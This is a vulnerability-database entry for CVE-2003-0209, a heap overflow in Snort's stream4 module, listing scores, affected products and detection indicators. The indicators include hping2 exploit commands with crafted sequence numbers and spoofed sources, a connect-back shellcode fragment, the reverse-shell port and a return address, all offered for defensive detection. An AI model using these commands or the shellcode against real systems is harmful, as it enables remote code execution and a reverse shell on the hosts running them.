cbcvebase.
CVE-2003-0209
published 2003-05-05

CVE-2003-0209: Integer overflow in the TCP stream reassembly module (stream4) for Snort 2.0 and earlier allows remote attackers to execute arbitrary code via large sequence…

PriorityP355critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
38.03%
98.4th percentile
Integer overflow in the TCP stream reassembly module (stream4) for Snort 2.0 and earlier allows remote attackers to execute arbitrary code via large sequence numbers in packets, which enable a heap-based buffer overflow.

Affected

11 ranges
VendorProductVersion rangeFixed in
smoothwallsmoothwall
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort
sourcefiresnort

Detection & IOCsextracted from sources · hover to see the quote

command$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014
command$HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014
command$HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 -d 0 --setseq 0xc0c4c014 --setack 0xffffffff
port45295
port0xb0ef (45295)
filenamep7snort191.sh
bytes
\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68
  • Exploit triggers integer overflow in Snort stream4 TCP reassembly by sending packets with large/crafted sequence numbers (0xffff0023, 0xffffffff) and specific ACK values (0xc0c4c014) to cause a heap-based buffer overflow.
  • First exploit packet uses TCP ACK+RST flags with sequence number 0xffff0023 and ACK 0xc0c4c014 and a 1-byte payload to prime the stream4 state.
  • Second exploit packet delivers the 0xF00 (3840)-byte payload egg (NOP sled + connect-back shellcode + return address padding) with sequence number 0xffffffff, triggering the heap overflow.
  • Shellcode initiates a connect-back (reverse shell) to the attacker on port 45295 (0xb0ef); monitor for unexpected outbound connections from Snort sensor hosts on this port.
  • Exploit uses spoofed source IP (hping2 -a flag) so the apparent source address of the triggering packets is not the true attacker IP; focus detection on the anomalous sequence numbers rather than source IP.
  • NOP sled of 512 bytes (0x90) prepended to shellcode in the payload egg; presence of a large 0x90 NOP sled in a TCP segment targeting Snort sensors is a strong indicator.
  • Default return address used for Slackware 8.0 targets is 0x0819fec2; presence of this value repeated in network payload indicates exploitation attempt.
  • ·Vulnerability affects Snort stream4 module; only Snort versions 2.0 and earlier are vulnerable. Snort deployments with stream4 disabled are not exploitable via this vector.
  • ·The exploit script uses spoofed source IPs via hping2; network-layer ACL blocking based on source IP alone will not prevent exploitation. Detection must rely on payload/sequence number anomalies.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.